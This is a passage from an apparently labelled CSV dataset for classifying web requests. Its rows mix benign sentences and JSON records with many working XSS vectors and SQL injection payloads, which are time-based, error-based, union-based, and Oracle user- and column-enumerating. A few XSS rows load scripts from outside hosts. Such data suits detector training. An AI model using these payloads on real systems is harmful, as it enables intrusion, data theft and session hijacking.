here</option>",1,XSS,887 -6453%' ) ) or ( 8459 = 8459 ) *4906 and ( ( '%' = ',2,SQLi,18198 "1 ) ) as xovu where 4530 = 4530 or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11358 "1"" where 9173 = 9173 rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) --",2,SQLi,14645 "1'+ ( select 'nzgq' where 7230 = 7230 and elt ( 1210 = 1210,sleep ( 5 ) ) ) +'",2,SQLi,15356 "alert(String.fromCharCode(88,83,83));'))"">",1,XSS,7332 "1"" ) ) ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ( ""urgd"" = ""urgd",2,SQLi,10224 "<article onpaste=""alert(1)"" contenteditable>test</article>",1,XSS,3897 Select voyage.,3,normal,24654 "-9504%"" ) ) or 8098 = 7472",2,SQLi,20989 Burr serves as chairman of the Senate Select Committee on Intelligence.,3,normal,26320 -3107' ) where 7782 = 7782 or 8571 = 8571--,2,SQLi,19241 <meta onpointerover=alert(1)>XSS</meta>,1,XSS,8252 -8071 ) ) or 9160 = 4253,2,SQLi,21191 select * from users where id = 1 + \+%$ or 1 = 1 -- 1,2,SQLi,18053 "<legend onclick=""alert(1)"">test</legend>",1,XSS,8015 "{""id"":null,""firstName"":""Tina"",""lastName"":""Koh"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26971 1 ) ) ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ( 9548 = 9548,2,SQLi,10615 Check values where applicable.,3,normal,23287 -9389' ) or 8859 = 3989--,2,SQLi,21116 """ ) or ( ""x"" ) = ( ""x",2,SQLi,21580 "<style>@keyframes x{}</style><canvas style=""animation-name:x"" onanimationstart=""alert(1)""></canvas>",1,XSS,1470 "1%"" ) ) and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #",2,SQLi,16878 -7710' where 5658 = 5658 or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) --,2,SQLi,10574 <time onfocusout=alert(1) tabindex=1 id=x></time><input autofocus>,1,XSS,2724 "<p onbeforecopy=""alert(1)"" contenteditable>test</p>",1,XSS,5421 Select the best ingredients.,3,normal,24305 "1; ( load_file ( char ( 47,101,116,99,47,112,97,115, ...",2,SQLi,17572 "Formal logicians say that, if they had to consider the matter, they must either consider all things, which would be impossible, or select some, which would be arbitrary.",3,normal,26170 to select something,3,normal,25260 "1' and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and 'lgat' like 'lgat",2,SQLi,12697 "<kbd oncut=""alert(1)"" contenteditable>test</kbd>",1,XSS,6043 "1"" and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ""oyuj"" = ""oyuj",2,SQLi,12085 "1 ) where 3738 = 3738 or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,14612 "{""id"":null,""name"":""Aurochs""}",3,normal,27065 "))) AND ELT(1337=1337,SLEEP(5)) AND (((1337=1337",2,SQLi,18659 <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>,1,XSS,2163 1'+ ( select gkve where 1943 = 1943 waitfor delay '0:0:5' ) +',2,SQLi,16949 <svg><span onload=alert(1)></span>,1,XSS,9250 Quickly select dinner.,3,normal,24430 Where's the tarot card reader?,3,normal,23655 "1 ) ) ) and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ( 6265 = 6265",2,SQLi,13916 "1' where 7464 = 7464 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,15757 "1'|| ( select 'yhkt' from dual where 7105 = 7105 or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) ) ||'",2,SQLi,10140 "<video onmouseleave=""alert(1)"">test</video>",1,XSS,7268 Let's find out where the nearest bus stop is.,3,normal,23796 -3956' ) or ( 8459 = 8459 ) *4906 and ( 'rflo' like 'rflo,2,SQLi,17483 "?getURLValue=javascript:alert(1)"",",1,XSS,9310 "<html onbeforepaste=""alert(1)"" contenteditable>test</html>",1,XSS,3938 "1%"" and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11749 "This window allows you to select different options, fill in your own name, add cc's and bcc's, and select an email template.",3,normal,25297 1%' ) ) ) rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and ( ( ( '%' = ',2,SQLi,15067 "ABC<div style=""x:\x0Bexpression(javascript:alert(1)"">DEF",1,XSS,4209 "-1504"" ) as wpes where 6256 = 6256 union all select 6256,6256,6256,6256,6256,6256,6256,6256,6256,6256#",2,SQLi,14057 "<script src=""\\example.com\foo.js""></script> // Safari 5.0//[""'`-->]]>]</div>",1,XSS,2151 ))%20waitfor%20delay%20'0:0:20'%20/*,2,SQLi,19937 <IMGSRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041>,1,XSS,76 1 where 4372 = 4372,2,SQLi,21994 <video id=x tabindex=1 onbeforeactivate=alert(1)></video>,1,XSS,4018 "-2125"" ) ) or 8571 = 8571--",2,SQLi,20927 "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))",2,SQLi,13065 ; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --,2,SQLi,14619 "<details onkeyup=""alert(1)"" contenteditable>test</details>",1,XSS,3934 "1"" and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ""zwov"" = ""zwov",2,SQLi,14694 "1',iif ( 9496 = 4153,1,1/0 )",2,SQLi,20828 1 and sleep ( 5 ) -- ruuv,2,SQLi,21051 1'|| ( select 'xwbo' from dual where 1263 = 1263 waitfor delay '0:0:5' ) ||',2,SQLi,15526 <applet onfocusout=alert(1) tabindex=1 id=x></applet><input autofocus>,1,XSS,2511 <style onreadystatechange=alert(1)></style>,1,XSS,7284 "<b onmouseover=""alert(1)"">test</b>",1,XSS,9247 Plant a fruit tree.,3,normal,22754 "<abbr onbeforecopy=""alert(1)"" contenteditable>test</abbr>",1,XSS,4069 "1 ) ) and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ( ( 6010 = 6010",2,SQLi,13124 "<;LAYER SRC="";http://ha.ckers.org/scriptlet.html"";>;<;/LAYER>;",1,XSS,3147 Select the right time for the meeting.,3,normal,24186 -4965 ) as imga where 3705 = 3705 union all select 3705--,2,SQLi,17537 "<big onmouseout=""alert(1)"">test</big>",1,XSS,8700 "<wbr onkeydown=""alert(1)"" contenteditable>test</wbr>",1,XSS,5133 "1"" ) ) ) and elt ( 4249 = 4249,7259 ) and ( ( ( ""vhmc"" = ""vhmc",2,SQLi,16948 "<picture onclick=""alert(1)"">test</picture>",1,XSS,7399 1' ) as akvn where 8669 = 8669,2,SQLi,20604 "AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( USERNAME ) FROM ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS ) WHERE LIMIT = 8 ) ) AND 'i' = 'i",2,SQLi,11584 1' ) ) as zqeg where 4729 = 4729 and ( 1098 = 9682 ) *9682--,2,SQLi,17162 "{""id"":null,""firstName"":""Catherine"",""lastName"":""Hiew"",""address"":""520 5TH AVE, MCKEESPORT PA 15132"",""city"":""150"",""telephone"":""5339889998""}",3,normal,26794 Delete posts.,3,normal,23039 I'm considering where to have the team-building event.,3,normal,23968 <dd id=x tabindex=1 onbeforedeactivate=alert(1)></dd><input autofocus>,1,XSS,2544 "<rb onkeyup=""alert(1)"" contenteditable>test</rb>",1,XSS,6075 1 ) as lisg where 5490 = 5490,2,SQLi,20690 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><cite id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></cite>",1,XSS,239 "1' ) ) ) and make_set ( 8403 = 8403,8899 ) and ( ( ( 'llfp' = 'llfp",2,SQLi,16508 Specify criteria where valid.,3,normal,23311 WHERE 1=1 AND 1=0--,2,SQLi,21916 <element id=x tabindex=1 onfocus=alert(1)></element>,1,XSS,5194 "<image draggable=""true"" ondrag=""alert(1)"">test</image>",1,XSS,4768 "<style>@keyframes x{}</style><audio style=""animation-name:x"" onanimationend=""alert(1)""></audio>",1,XSS,1622 "<ol onmouseover=""alert(1)"">test</ol>",1,XSS,8796 "<!-- ><img title=""--><iframe/onload=alert(1)>""> --> <!-- ><img title=""--><iframe/onload=alert(1)>""> -->",1,XSS,1310 ( select ( case when ( 6035 = 9882 ) then 6035 else 6035* ( select 6035 from mysql.db ) end ) ),2,SQLi,14398 "<iframe src=""javascript:alert('XSS by \nxss');""></iframe><marquee><h1>XSS by xss</h1></marquee>",1,XSS,1584 Where did you find that rare book?,3,normal,22959 "<a href=""\x13javascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2433 "{""id"":null,""firstName"":""Hoe"",""lastName"":""Siew Lan"",""address"":""185 Blackstone Bldge"",""city"":""367"",""telephone"":""246100175""}",3,normal,26945 "<div draggable=""true"" contenteditable>drag me</div><dialog ondrop=alert(1) contenteditable>drop here</dialog>",1,XSS,1046 Select the appropriate filter for the water.,3,normal,24167 "<label oncopy=""alert(1)"" contenteditable>test</label>",1,XSS,5011 "select * from users where id = 1 or 1#""; or 1 = 1 -- 1",2,SQLi,17895 "<mark onmouseenter=""alert(1)"">test</mark>",1,XSS,7636 "1'|| ( select 'gwxc' from dual where 3626 = 3626 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,10955 SLEEP(5)=',2,SQLi,22426 "<menuitem onmouseenter=""alert(1)"">test</menuitem>",1,XSS,5797 <script>window['alert'](document['domain'])<script>,1,XSS,5493 Update profile.,3,normal,23013 "1%' ) ) ) and make_set ( 1543 = 5817,5817 ) and ( ( ( '%' = '",2,SQLi,17026 "1 where 6077 = 6077 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,11821 1'|| ( select 'pyga' from dual where 8501 = 8501 or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #,2,SQLi,13975 "<style>@keyframes x{}</style><table style=""animation-name:x"" onanimationend=""alert(1)""></table>",1,XSS,1602 "{""id"":null,""firstName"":""Desmond"",""lastName"":""Tan"",""address"":""8284 Hart St"",""city"":""7"",""telephone"":""6150791007""}",3,normal,27030 &lt;DIV STYLE=&quot;background-image: url(javascript:alert(&apos;XSS&apos;))&quot;&gt;,1,XSS,1851 "<meta charset= ""x-imap4-modified-utf7""&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>",1,XSS,1754 <picture id=x tabindex=1 ondeactivate=alert(1)></picture><input id=y autofocus>,1,XSS,2042 "1"" ) ) as ubrg where 7318 = 7318 and 7331 = 6529--",2,SQLi,18491 <main onpointerleave=alert(1)>XSS</main>,1,XSS,7968 "<a onbeforepaste=""alert(1)"" contenteditable>test</a>",1,XSS,5233 "<style>:target {transform: rotate(180deg);}</style><optgroup id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></optgroup>",1,XSS,548 "<bgsound onmouseleave=""alert(1)"">test</bgsound>",1,XSS,6201 Where's the perfect place to have a picnic?,3,normal,23814 "<tbody oncut=""alert(1)"" contenteditable>test</tbody>",1,XSS,5149 The lecturer registers with the site and then can select which elements of the course s/he wants to make available to their students.,3,normal,25422 1 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) # lexm,2,SQLi,10761 "-8771"" ) ) union all select 6302,6302,6302,6302,6302#",2,SQLi,18075 "1 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,12215 "1"" ) and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and ( ""ijop"" = ""ijop",2,SQLi,10718 %27%20or%201=1,2,SQLi,22195 <script onpointermove=alert(1)>XSS</script>,1,XSS,7172 "-7122"" ) union all select 4002,4002,4002,4002,4002,4002,4002,4002#",2,SQLi,16583 "1, ( case when 2872 = 2872 then 1 else null end )",2,SQLi,18616 The Health Care Select Sector SPDR (XLV) fell 2 percent.,3,normal,25437 Select the right answer.,3,normal,24311 Please select one of the items below or navigate via the left-hand side menu.,3,normal,25776 "-9046' ) ) as ymqc where 3733 = 3733 union all select 3733,3733,3733,3733,3733,3733,3733--",2,SQLi,14674 "1 ) and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) )",2,SQLi,15326 "1, ( select ( case when ( 8382 = 8382 ) then 1 else 1/ ( select 0 ) end ) )",2,SQLi,15598 -6036 ) ) ) or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ( ( 6723 = 6723,2,SQLi,10441 Select a dish from the menu.,3,normal,24194 -9690 union all select 7217#,2,SQLi,20803 </br style=a:expression(alert())>,1,XSS,9321 "{""id"":null,""name"":""Vampire Bat""}",3,normal,27479 waitfor delay '0:0:5' and ( ( 'yjsp' like 'yjsp,2,SQLi,18849 "1 ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( 8600 = 8600",2,SQLi,17730 "1%"" ) union all select null,null,null,null,null,null--",2,SQLi,18011 "1'+ ( select 'rryx' where 1228 = 1228 union all select null,null,null,null,null,null,null,null,null#",2,SQLi,14114 "<ruby onbeforecopy=""alert(1)"" contenteditable>test</ruby>",1,XSS,4067 Select bargain.,3,normal,24770 "<style>:target {color:red;}</style><dir id=x style=""transition:color 1s"" ontransitionend=alert(1)></dir>",1,XSS,1296 "select * from users where id = '1' or \< = 1 union select 1,@@VERSION -- 1'",2,SQLi,15590 "<meta http-equiv=""Content-Security-Policy"" content=""upgrade-insecure-requests"">",1,XSS,2002 "<xss oncopy=alert(1) value=""XSS"" autofocus tabindex=1 style=display:block>test",1,XSS,2065 "The number of these select members is small in comparison with the whole Society; the exact proportion varies from time to time, the present tendency being to increase the number.",3,normal,25408 <xss onfocusout=alert(1) autofocus tabindex=1 style=display:block>test</xss><input value=clickme>,1,XSS,1509 <animate onpointerdown=alert(1)>XSS</animate>,1,XSS,6686 "1' in boolean mode ) union all select null,null,null--",2,SQLi,17967 "<big onkeyup=""alert(1)"" contenteditable>test</big>",1,XSS,5579 -9556 or ( 2049 = 6967 ) *6967# mhbc,2,SQLi,19960 \x3Cscript>javascript:alert(1)</script>,1,XSS,8092 "<blockquote onmouseup=""alert(1)"">test</blockquote>",1,XSS,5613 "1%"" union all select null,null,null--",2,SQLi,19842 Order a vegetarian dish.,3,normal,22636 "<div style=""font-family:'foo&#10;;color:red;';"">XXX",1,XSS,5337 "echo('IPT>alert("""")</SCRIPT>')",1,XSS,9549 "<track onkeypress=""alert(1)"" contenteditable>test</track>",1,XSS,4143 "<abbr onmousemove=""alert(1)"">test</abbr>",1,XSS,7941 1' where 6135 = 6135,2,SQLi,21814 "1%' and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and '%' = '",2,SQLi,13060 "<picture oncontextmenu=""alert(1)"">test</picture>",1,XSS,6018 "1 ) as oblq where 2002 = 2002 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) --",2,SQLi,12248 "1' and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,17643 Select a book from the shelf.,3,normal,22996 Mary and the Witch's Flower is out now in select theaters.,3,normal,25893 "1' and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and 'hhbh' = 'hhbh",2,SQLi,12973 <basefont onfocusout=alert(1) tabindex=1 id=x></basefont><input autofocus>,1,XSS,2253 "<embed draggable=""true"" ondragenter=""alert(1)"">test</embed>",1,XSS,3672 "1"" ) ) as ljhz where 2416 = 2416",2,SQLi,20257 "1"" union all select null,null,null,null#",2,SQLi,19484 -2717' ) ) ) or 8571 = 8571--,2,SQLi,20724 "1' ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 )",2,SQLi,13460 Select your peek.,3,normal,24989 1%' or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #,2,SQLi,17355 "1' ) ) or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11713 1'|| ( select 'zwcp' where 3333 = 3333,2,SQLi,19733 1%' ) ) ) union all select null--,2,SQLi,20212 "1"" where 4161 = 4161 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,14220 ORDER BY 15--,2,SQLi,22238 "1 and make_set ( 8403 = 8403,8899 ) # zysq",2,SQLi,19289 "{""id"":null,""name"":""dried""}",3,normal,27090 1%' ) ) ) and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #,2,SQLi,16690 "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))--",2,SQLi,12987 "1' union all select null,null--",2,SQLi,20492 "1'|| ( select 'osux' from dual where 7066 = 7066 or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) ) ||'",2,SQLi,11934 <link rel=stylesheet href=1 onerror=alert(1)>,1,XSS,6700 I need to decide where to go for a run.,3,normal,23789 "<del oncut=""alert(1)"" contenteditable>test</del>",1,XSS,6060 "),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,18248 "-2743 union all select 6757,6757,6757,6757,6757,6757--",2,SQLi,17972 "<thead onkeyup=""alert(1)"" contenteditable>test</thead>",1,XSS,4700 "1"" where 9172 = 9172 or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) --",2,SQLi,10774 "<address draggable=""true"" ondragend=""alert(1)"">test</address>",1,XSS,3322 "-7347"" ) ) union all select 4360,4360,4360,4360,4360,4360,4360,4360,4360#",2,SQLi,15888 -6244' ) as szpd where 8445 = 8445 or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --,2,SQLi,10488 "1%' ) ) ) procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and ( ( ( '%' = '",2,SQLi,12470 <element id=x tabindex=1 onfocusin=alert(1)></element>,1,XSS,4775 "<a oncopy=""alert(1)"" contenteditable>test</a>",1,XSS,6578 or 1=1#,2,SQLi,22512 <multicol id=x tabindex=1 onfocus=alert(1)></multicol>,1,XSS,4711 "1' ) where 7640 = 7640 and make_set ( 8978 = 8594,8594 ) --",2,SQLi,17255 "1 and elt ( 4249 = 4249,7259 ) # lwyo",2,SQLi,19858 "-5247"" union all select 3097,3097,3097,3097,3097,3097,3097#",2,SQLi,17246 "1 ) ) and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,13677 eval(location.hash.slice(1)>#alert(1),1,XSS,8743 Insert fresh batteries into the remote control.,3,normal,22907 <blockquote onpointerup=alert(1)>XSS</blockquote>,1,XSS,5787 "-5924' where 5415 = 5415 union all select 5415,5415,5415,5415,5415,5415#",2,SQLi,15989 1') AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND ('1337'='1337,2,SQLi,17012 "1' ) ) and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,13584 "1', ( cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select 1 from generate_series ( 8979,8979,case when ( 8979 = 8979 ) then 1 else 0 end ) limit 1 ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) )",2,SQLi,10294 Select a camera for the photography.,3,normal,24012 <isindex type=image src=1 onerror=alert(1)>,1,XSS,7228 <base id=x tabindex=1 ondeactivate=alert(1)></base><input id=y autofocus>,1,XSS,2313 "admin"" ) or ( ""1"" = ""1""#",2,SQLi,21181 -7633' ) as aslj where 2317 = 2317 or 8571 = 8571--,2,SQLi,18390 "1' ) ) as uuuk where 7234 = 7234 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) --",2,SQLi,12682 "<div onmousedown=""alert(1)"">test</div>",1,XSS,8394 I want to choose a hairstyle for the event.,3,normal,23890 <map onpointerdown=alert(1)>XSS</map>,1,XSS,8680 1'|| ( select 'ytwz' from dual where 3025 = 3025 and ( 5039 = 5303 ) *5303 ) ||',2,SQLi,15191 1' and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and 'sqvt' like 'sqvt,2,SQLi,12940 "<template draggable=""true"" ondragenter=""alert(1)"">test</template>",1,XSS,2825 <link id=x tabindex=1 onbeforeactivate=alert(1)></link>,1,XSS,4553 <style>*{x:expression(javascript:alert(1))}</style>,1,XSS,5338 "AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( column_name ) FROM ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns ) WHERE LIMIT = 1 ) ) AND 'i' = 'i",2,SQLi,11461 "1' ) or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,14033 "1' ) ) ) or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ( ( 'gucd' = 'gucd",2,SQLi,11377 "<small onbeforecopy=""alert(1)"" contenteditable>test</small>",1,XSS,3751 "1"" ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ""rrbl"" = ""rrbl",2,SQLi,10418 1' where 8584 = 8584 order by 1#,2,SQLi,20370 "),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,16556 Select a cozy chair.,3,normal,22758 "<dd ondblclick=""alert(1)"">test</dd>",1,XSS,9082 <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>,1,XSS,526 Where should we meet for our date?,3,normal,22969 "select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and 'qipt' = 'qipt",2,SQLi,13756 Please select one item.,3,normal,24453 When you reach the checkout you'll be asked to select which you prefer.,3,normal,25152 "javascript:alert()//\ /*<svg/onload=';alert();'></textarea></style></title></noscript></template></noembed><frame onload="";alert();""></script>--><script>alert`;alert();`</script>*/alert()//\"";alert()//",1,XSS,124 "1 ) where 9371 = 9371 union all select null,null,null,null,null,null,null--",2,SQLi,15644 <h1>INJECTX</h1>,1,XSS,9802 Democrats need to consider Trump's strengths as they select their nominee.,3,normal,26250 <slot id=x tabindex=1 onbeforedeactivate=alert(1)></slot><input autofocus>,1,XSS,2285 <menu id=x tabindex=1 ondeactivate=alert(1)></menu><input id=y autofocus>,1,XSS,2304 "1 ) ) as kgit where 1919 = 1919 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,11633 Can you help me choose where to go for coffee?,3,normal,23791 "select * from generate_series ( 2382,2382,case when ( 2382 = 4352 ) then 1 else 0 end ) limit 1--",2,SQLi,14316 "<wbr oncopy=""alert(1)"" contenteditable>test</wbr>",1,XSS,5822 ( select ( case when ( 9263 = 9263 ) then 1 else 9263* ( select 9263 from mysql.db ) end ) ),2,SQLi,14577 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2--",2,SQLi,19443 1' ) ) ) and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #,2,SQLi,16794 1 ) where 6950 = 6950 rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) --,2,SQLi,15197 "javascript:/*--></title></style></template></noscript></noembed></textarea></script><svg/onload='+/""/+/onclick=1/+/[*/[]/+alert()//'>""><svg/onload=`+/""/+/onclick=/+/[*/[]/+alert()//'>""><script>alert()</script><frame src=""javascript:alert()""></frameset>+\""; alert()//<img src onerror=alert()>",1,XSS,50 `=`1` AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND `1`=`1,2,SQLi,16909 "-2549' ) as zfnf where 1993 = 1993 union all select 1993,1993,1993,1993,1993,1993--",2,SQLi,15035 <rb onfocusout=alert(1) tabindex=1 id=x></rb><input autofocus>,1,XSS,3187 1' ) rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) and ( 'ejnt' like 'ejnt,2,SQLi,14369 select ( case when ( 7594 = 8086 ) then 7594 else 1/ ( select 0 ) end ) --,2,SQLi,15798 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><samp id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></samp>",1,XSS,231 1%' ) rlike sleep ( 5 ) #,2,SQLi,21101 "<template onbeforecopy=""alert(1)"" contenteditable>test</template>",1,XSS,2826 "<IMG SRC='vbscript:msgbox(\""XSS\"")'>",1,XSS,8775 "<style>:target {color: red;}</style><link id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></link>",1,XSS,971 "<menuitem onkeypress=""alert(1)"" contenteditable>test</menuitem>",1,XSS,3009 "{""id"":null,""name"":""smooth""}",3,normal,27006 "-4535' ) union all select 8491,8491,8491,8491,8491,8491--",2,SQLi,17482 "1' ) and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( 'nlfl' like 'nlfl",2,SQLi,10966 -9721' 